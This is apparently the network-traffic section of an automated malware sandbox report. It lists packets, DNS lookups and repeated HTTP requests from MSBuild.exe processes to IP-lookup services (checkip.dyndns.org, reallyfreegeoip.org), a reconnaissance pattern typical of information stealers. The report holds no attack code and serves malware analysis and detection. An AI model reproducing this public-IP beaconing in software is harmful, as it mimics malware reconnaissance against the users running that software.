Nov 6, 2024 17:04:07.488349915 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:07.488938093 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:04:07.488965034 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:07.489419937 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:04:07.489427090 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:09.412463903 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:09.412570953 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:09.412621021 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:04:09.412929058 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:04:09.412929058 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:04:09.412950993 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:09.412960052 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:09.867744923 CET	56798	443	192.168.2.6	40.126.31.73
Nov 6, 2024 17:04:09.873177052 CET	443	56798	40.126.31.73	192.168.2.6
Nov 6, 2024 17:04:09.873296976 CET	56798	443	192.168.2.6	40.126.31.73
Nov 6, 2024 17:04:10.554351091 CET	50262	443	192.168.2.6	13.107.246.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 17:02:41.924393892 CET	51495	53	192.168.2.6	1.1.1.1
Nov 6, 2024 17:02:42.181488037 CET	53	51495	1.1.1.1	192.168.2.6
Nov 6, 2024 17:02:44.274158001 CET	62560	53	192.168.2.6	1.1.1.1
Nov 6, 2024 17:02:44.282915115 CET	53	62560	1.1.1.1	192.168.2.6
Nov 6, 2024 17:03:01.481378078 CET	53	64350	162.159.36.2	192.168.2.6
Nov 6, 2024 17:03:02.369319916 CET	60469	53	192.168.2.6	1.1.1.1
Nov 6, 2024 17:03:02.377573013 CET	53	60469	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 6, 2024 17:02:41.924393892 CET	192.168.2.6	1.1.1.1	0x7dc	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:44.274158001 CET	192.168.2.6	1.1.1.1	0x3795	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:03:02.369319916 CET	192.168.2.6	1.1.1.1	0xe120	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 6, 2024 17:02:38.557161093 CET	1.1.1.1	192.168.2.6	0xb65c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 6, 2024 17:02:38.557161093 CET	1.1.1.1	192.168.2.6	0xb65c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:42.181488037 CET	1.1.1.1	192.168.2.6	0x7dc	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:44.282915115 CET	1.1.1.1	192.168.2.6	0x3795	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:44.282915115 CET	1.1.1.1	192.168.2.6	0x3795	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:47.751630068 CET	1.1.1.1	192.168.2.6	0xc99a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 6, 2024 17:02:47.751630068 CET	1.1.1.1	192.168.2.6	0xc99a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:49.553936958 CET	1.1.1.1	192.168.2.6	0x7e64	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:02:49.553936958 CET	1.1.1.1	192.168.2.6	0x7e64	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 6, 2024 17:03:02.377573013 CET	1.1.1.1	192.168.2.6	0xe120	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	56815	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:42.207334042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:43.380105019 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee22f5c5a4509e704d9e98a37bff2684 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:43.381920099 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee22f5c5a4509e704d9e98a37bff2684 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:43.942051888 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:44.188885927 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:44 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f642a1792df5a9bd4ac07b06c3828a2a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:45.168216944 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:45.417886972 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:45 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0674c2659ef48dee9346163ff314a0cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	56841	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:46.313200951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:47.142118931 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:47 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 811af6d69f83974f60d7d04fa074bc52 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	56843	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:46.933151960 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:47.779933929 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:47 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c32b07aa18a295c2c720a0ee0328b327 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:47.783888102 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:48.030507088 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:47 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 818008912c3b33266152162f77761a29 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:49.804191113 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:50.287190914 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:49 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6774ba637e696eb5236d2d27c6ea0817 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:50.288029909 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:49 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6774ba637e696eb5236d2d27c6ea0817 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	56856	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:47.930090904 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:48.767699003 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:48 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75d2eb0863dfa30064a8f3adc4425d96 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	56864	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:49.571244955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:50.397782087 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:50 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0bf1e9ffc9a964fe0f4062f70afc791f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	56874	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:51.085011005 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:51.950792074 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:51 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 605c7a2afba1eeb6a86a98f440094bd8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	56875	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:51.183412075 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:53.052979946 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63566baf086c48951ee19babaeb7a8b3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	56885	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:52.841434002 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:53.996678114 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c252102cb8a2b483542c8a98a34e8c1f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
Nov 6, 2024 17:02:53.997026920 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c252102cb8a2b483542c8a98a34e8c1f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	56892	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:54.171794891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:54.997239113 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:54 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 44092ac742e9aa86fa6aa8eed6e99c98 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	56897	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:54.808233976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 6, 2024 17:02:55.676589966 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:55 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 827dc65658d87c7ed3a40f118841dad2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	56905	193.122.6.168	80	7200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:55.782998085 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:56.649746895 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3ce29180a52de8e36971e9df2165769 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	56910	193.122.6.168	80	7636	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 17:02:56.483591080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 6, 2024 17:02:57.540529966 CET	323	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 16:02:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f89639524acf1d027d2925d18fb18706 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
